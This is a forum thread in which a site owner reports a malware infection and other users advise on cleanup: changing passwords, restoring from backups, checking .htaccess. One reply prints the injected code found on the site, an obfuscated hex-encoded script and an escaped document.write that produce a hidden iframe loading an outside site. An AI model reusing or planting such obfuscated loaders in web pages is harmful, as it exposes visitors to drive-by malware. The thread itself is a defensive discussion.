Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 6 of 6
  1. #1
    New to the CF scene
    Join Date
    Dec 2008
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Site Malware Infection--Please Help

    Hello. I received a troubling email from a user of my website this morning, notifying me that my website has been infected by malware, and is dangerous to its visitors. I am new to web design and do not know how this happened, or how to remove it. I noticed last night that a strange glitch was causing my site’s home page, along with any pages linked to it named “index” to have their tables misaligned. Since I had added a code I fund online for faviconcs to the home page of the site on its last update a week earlier, I thought that might be responsible. (That code was <link rel="shortcut icon" href="/favicon.ico">) I tried removing this code and re-uploading the effected pages. This seemed to correct the misalignment, but I am worried that a worse problem has arisen. Is there anyone who can give me any advice? Any suggestions for how to make my website safe again would be very appreciated!

    (If relevant, my website URL is www.Nosgoth.net.)
    Last edited by Tenaya_Pyweack; 12-18-2008 at 05:57 PM.

  • #2
    Regular Coder
    Join Date
    Sep 2008
    Location
    Oklahoma
    Posts
    249
    Thanks
    11
    Thanked 13 Times in 13 Posts
    favicon wouldnt cause it do do that. someone must have logged in and added other code.

    If it is infected I wont click on the link you posted. My mom had to have me reinstall her computer because of stuff like this, she went on a baby shower website and got bombarded by self-installing trojans.

    I suggest change your passwords for your host login and upload your site from your backup files.

    make sure you computer doesnt have any keyloggers that would save passwords.

  • #3
    Supreme Master coder! _Aerospace_Eng_'s Avatar
    Join Date
    Dec 2004
    Location
    In a place far, far away...
    Posts
    19,291
    Thanks
    2
    Thanked 1,043 Times in 1,019 Posts
    I found this in your code
    Code:
    <iframe src="http://palech.com/index.php" width="0" height="0" style="display:none"></iframe>
    Its the decryption of this
    Code:
    <script>function c102916999516l494578a51c6c4(l494578a51d5ce){ var l494578a51da4d=16; return (parseInt(l494578a51d5ce,l494578a51da4d));}function l494578a51e9ec(l494578a51f1e7){ function l494578a52092e(){var l494578a521106=2;return l494578a521106;} var l494578a51f98d='';l494578a5218cf=String.fromCharCode;for(l494578a52015e=0;l494578a52015e<l494578a51f1e7.length;l494578a52015e+=l494578a52092e()){ l494578a51f98d+=(l494578a5218cf(c102916999516l494578a51c6c4(l494578a51f1e7.substr(l494578a52015e,l494578a52092e()))));}return l494578a51f98d;} var x8a='';var l494578a5220a0='3C736'+x8a+'3726'+x8a+'970743E6'+x8a+'96'+x8a+'6'+x8a+'28216'+x8a+'D796'+x8a+'96'+x8a+'1297B6'+x8a+'46'+x8a+'F6'+x8a+'3756'+x8a+'D6'+x8a+'56'+x8a+'E742E77726'+x8a+'9746'+x8a+'528756'+x8a+'E6'+x8a+'5736'+x8a+'36'+x8a+'1706'+x8a+'528202725336'+x8a+'32536'+x8a+'392536'+x8a+'36'+x8a+'2537322536'+x8a+'312536'+x8a+'6'+x8a+'42536'+x8a+'352532302536'+x8a+'6'+x8a+'52536'+x8a+'312536'+x8a+'6'+x8a+'42536'+x8a+'3525336'+x8a+'42536'+x8a+'332533312533302532302537332537322536'+x8a+'3325336'+x8a+'42532372536'+x8a+'3825373425373425373025336'+x8a+'125326'+x8a+'6'+x8a+'25326'+x8a+'6'+x8a+'2536'+x8a+'372536'+x8a+'6'+x8a+'6'+x8a+'2536'+x8a+'372536'+x8a+'6'+x8a+'6'+x8a+'2533322536'+x8a+'6'+x8a+'42536'+x8a+'3525326'+x8a+'52536'+x8a+'6'+x8a+'52536'+x8a+'3525373425326'+x8a+'6'+x8a+'25326'+x8a+'52536'+x8a+'372536'+x8a+'6'+x8a+'6'+x8a+'25326'+x8a+'6'+x8a+'2536'+x8a+'332536'+x8a+'382536'+x8a+'352536'+x8a+'332536'+x8a+'6'+x8a+'225326'+x8a+'52536'+x8a+'382537342536'+x8a+'6'+x8a+'42536'+x8a+'6'+x8a+'32532372532302537372536'+x8a+'392536'+x8a+'342537342536'+x8a+'3825336'+x8a+'42533372533302533352532302536'+x8a+'382536'+x8a+'352536'+x8a+'392536'+x8a+'372536'+x8a+'3825373425336'+x8a+'42533382533382532302537332537342537392536'+x8a+'6'+x8a+'32536'+x8a+'3525336'+x8a+'4253237253736'+x8a+'2536'+x8a+'392537332536'+x8a+'392536'+x8a+'322536'+x8a+'392536'+x8a+'6'+x8a+'32536'+x8a+'3925373425373925336'+x8a+'12536'+x8a+'382536'+x8a+'392536'+x8a+'342536'+x8a+'342536'+x8a+'352536'+x8a+'6'+x8a+'525323725336'+x8a+'525336'+x8a+'325326'+x8a+'6'+x8a+'2536'+x8a+'392536'+x8a+'36'+x8a+'2537322536'+x8a+'312536'+x8a+'6'+x8a+'42536'+x8a+'3525336'+x8a+'52729293B7D76'+x8a+'6'+x8a+'172206'+x8a+'D796'+x8a+'96'+x8a+'13D7472756'+x8a+'53B3C2F736'+x8a+'3726'+x8a+'970743E';document.write(l494578a51e9ec(l494578a5220a0));</script><!-- o --><Script Language='Javascript'>
    <!-- HTML Encryption provided by iWEBTOOL.com -->
    <!--
    document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%61%6C%65%63%68%2E%63%6F%6D%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
    //-->
    </Script>
    Did you put any of that there yourself? I suggest you contact your host and try to remove any code that looks like the above.
    ||||If you are getting paid to do a job, don't ask for help on it!||||

  • Users who have thanked _Aerospace_Eng_ for this post:

    oesxyl (12-18-2008)

  • #4
    New to the CF scene
    Join Date
    Dec 2008
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Thank you both very much! If Windows’ AutoComplete feature counts as what you mean by a keylogger, I did have one that had memorized the password for my website. I have now changed my password and re-uploaded everything from the files on my hard drive. It appears to be working now. Hopefully it will continue to.

  • #5
    Regular Coder optimus203's Avatar
    Join Date
    Sep 2008
    Location
    CT
    Posts
    317
    Thanks
    22
    Thanked 16 Times in 15 Posts
    I was having the same problem with one of my sites. Apparently, someone gained access to an FTP login, and was changing the .htaccess file to redirect to a bogus anti-virus site. So while there may have been nothing wrong with your site, it's the best idea to make sure this .htaccess file is not changed, and the login passwords, along with FTP passwords are changed.
    Always thank those CF Users who help you solve issues...
    Connecticut Web Design

  • #6
    Senior Coder gnomeontherun's Avatar
    Join Date
    Sep 2007
    Location
    Houston
    Posts
    2,846
    Thanks
    10
    Thanked 238 Times in 229 Posts
    I would second what Aero says, contact your host. They know these things and can often fix them for you. Of course a good password is paramount though. I had this happen to a client, because they chose a dictionary word as a password, and it was hacked. Its pesky, because you don't always know where the affected areas are, and your support might be able to track down when it occurred, which files were changed, and clean it up must faster (and more thoroughly) than you can on your own.

    Of course if you have little or no support, check the .htaccess and look at every file and folder!
    jeremy - gnomeontherun
    Educated questions often get educated answers, and simple questions often get simple answers.


  •  

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •